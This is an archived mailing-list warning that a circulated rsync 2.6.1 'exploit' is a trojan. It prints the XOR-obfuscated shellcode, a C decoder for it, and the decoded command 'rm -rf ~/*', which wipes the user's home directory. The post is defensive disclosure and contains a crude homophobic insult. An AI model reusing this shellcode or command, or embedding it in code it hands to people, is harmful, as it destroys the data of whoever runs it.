lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
Message-ID: <BAY8-F52FHfLQV8xl8W00049755@hotmail.com>
From: downbload at hotmail.com (DownBload / Illegal Instruction Labs)
Subject: rsynd-too-open.c posted on fd is backdoored.  Don't run it!!!

rsync <= 2.6.1 remote exploit posted to full disclosure list is a fake and 
malicious exploit.
Don't run it!!!

rsynd-too-open.c:
....
void (*funct) ();
....
(long) funct = &shellcode2;
....
funct();
....

"shellcode2" is a malicious asm code that will delete your home directory.
Shellcode is encrypted with a simple XOR algorithm to obscure its main 
purpose.
Whoever backdoored this exploit is 100% gaydiot (mix between gay and idiot 
:).
I can understand people who backdoor exploits to hack machines, but placing
backdoors that will delete user home dir is evil and plain stupid.


[rot@...top BACKDOOR]# gcc back.c
[root@...top BACKDOOR]# ./a.out
è %    / b i n / s h  s h  - c  r m   - r f   ~ / *   2 > / d e v / n u l l


back.c
---cut here---
char shellcode2[] =
"\xeb\x10\x5e\x31\xc9\xb1\x4b\xb0\xff\x30\x06\xfe\xc8\x46\xe2\xf9"
"\xeb\x05\xe8\xeb\xff\xff\xff\x17\xdb\xfd\xfc\xfb\xd5\x9b\x91\x99"
"\xd9\x86\x9c\xf3\x81\x99\xf0\xc2\x8d\xed\x9e\x86\xca\xc4\x9a\x81"
"\xc6\x9b\xcb\xc9\xc2\xd3\xde\xf0\xba\xb8\xaa\xf4\xb4\xac\xb4\xbb"
"\xd6\x88\xe5\x13\x82\x5c\x8d\xc1\x9d\x40\x91\xc0\x99\x44\x95\xcf"
"\x95\x4c\x2f\x4a\x23\xf0\x12\x0f\xb5\x70\x3c\x32\x79\x88\x78\xf7"
"\x7b\x35";


main (int argc, char **argv)
{
        char *decrypt = shellcode2+23, key=0xff;
        int x;
        for (x=0;x<0x29;x++) {
                printf ("%c ", *decrypt ^ key);
                decrypt++;
                key--;
        }

}
---cut here---

_________________________________________________________________
Add photos to your e-mail with MSN 8. Get 2 months FREE*. 
http://join.msn.com/?page=features/featuredemail

Powered by blists - more mailing lists